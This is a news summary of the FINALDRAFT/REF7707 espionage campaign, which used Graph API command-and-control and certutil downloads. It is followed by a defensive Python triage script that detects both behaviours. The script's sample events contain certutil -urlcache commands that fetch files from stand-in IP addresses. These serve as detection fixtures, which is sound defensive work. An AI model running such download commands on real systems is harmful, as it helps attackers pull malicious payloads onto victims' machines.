FINALDRAFT Malware Exploits Microsoft Graph API for Espionage on Windows and Linux

Summary: A new espionage campaign targeting a South American foreign ministry and other entities has been detected, using sophisticated malware capable of remote access. The campaign, tracked as REF7707 by Elastic Security Labs, involves the use of tools such as PATHLOADER and FINALDRAFT to execute commands and maintain control. Researchers highlighted the campaign's engineering quality alongside poor operational management by the attackers.

Affected: South American foreign ministry, telecommunications entity, university in Southeast Asia

Key points:

  • The campaign utilizes bespoke malware (FINALDRAFT) for remote administration and command-and-control operations.
  • Attackers exploited valid network credentials for lateral movement and executed downloads via Microsoft’s certutil application.
  • A Linux variant of the malware suggests a broader operational scope with similar command-and-control functionalities.
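Two of the behaviours named above (downloads launched through certutil, and command-and-control traffic riding on the Microsoft Graph API) are visible in ordinary endpoint telemetry. The following is an added triage example, not code from the original article or from Elastic Security Labs; it runs over constructed Sysmon-style process-creation and network-connection events, flags certutil invocations that use -urlcache with a URL, and flags connections to graph.microsoft.com from processes outside an assumed allowlist. The event field names and the allowlist are assumptions to be adapted to your own log schema and software inventory.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# These are illustrative records, not telemetry from the REF7707 campaign.
PROCESS_EVENTS = [
    {"host": "ws01", "user": r"CORP\alice", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/update.dat C:\Users\Public\update.dat"},
    {"host": "ws02", "user": r"CORP\bob", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\tmp\file.bin SHA256"},   # benign hashing use
    {"host": "ws03", "user": r"CORP\carol", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "certutil -urlcache -f https://198.51.100.7/a.txt a.txt"'},
]

# Constructed sample network-connection events (Sysmon Event ID 3 style).
NETWORK_EVENTS = [
    {"host": "ws01", "image": r"C:\Users\Public\update.exe",
     "dest_host": "graph.microsoft.com", "dest_port": 443},
    {"host": "ws04", "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "dest_host": "graph.microsoft.com", "dest_port": 443},
]

# Assumed allowlist of processes expected to reach the Graph API on a typical
# corporate build; tune this to the software actually deployed in your estate.
GRAPH_ALLOWLIST = {"outlook.exe", "teams.exe", "onedrive.exe", "msedge.exe", "chrome.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
URLCACHE_RE = re.compile(r"(^|\s)-urlcache\b", re.IGNORECASE)


def flag_certutil_download(event):
    """Return a finding when certutil is used as a downloader (-urlcache plus a URL), else None."""
    cmd = event["cmdline"]
    if "certutil" not in cmd.lower():
        return None
    if not URLCACHE_RE.search(cmd):
        return None
    m = URL_RE.search(cmd)
    if not m:
        return None
    return {"rule": "certutil_urlcache_download", "host": event["host"],
            "user": event["user"], "url": m.group(0)}


def flag_graph_beacon(event, allowlist=GRAPH_ALLOWLIST):
    """Return a finding when a non-allowlisted process connects to graph.microsoft.com, else None."""
    if event["dest_host"].lower() != "graph.microsoft.com":
        return None
    proc = event["image"].rsplit("\\", 1)[-1].lower()   # basename of the image path
    if proc in allowlist:
        return None
    return {"rule": "graph_api_unexpected_process", "host": event["host"], "image": event["image"]}


def triage(process_events, network_events):
    """Run both detections over the supplied events and collect the findings."""
    findings = []
    for ev in process_events:
        f = flag_certutil_download(ev)
        if f:
            findings.append(f)
    for ev in network_events:
        f = flag_graph_beacon(ev)
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in triage(PROCESS_EVENTS, NETWORK_EVENTS):
        print(finding)
```

The Graph check is deliberately an allowlist rather than a blocklist: the API is legitimate and heavily used, so the signal is an unexpected process (here a binary dropped under C:\Users\Public) talking to it, not the destination itself. The certutil rule keys on the -urlcache switch so that routine hashing or certificate verification does not fire.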

Source: https://thehackernews.com/2025/02/finaldraft-malware-exploits-microsoft.html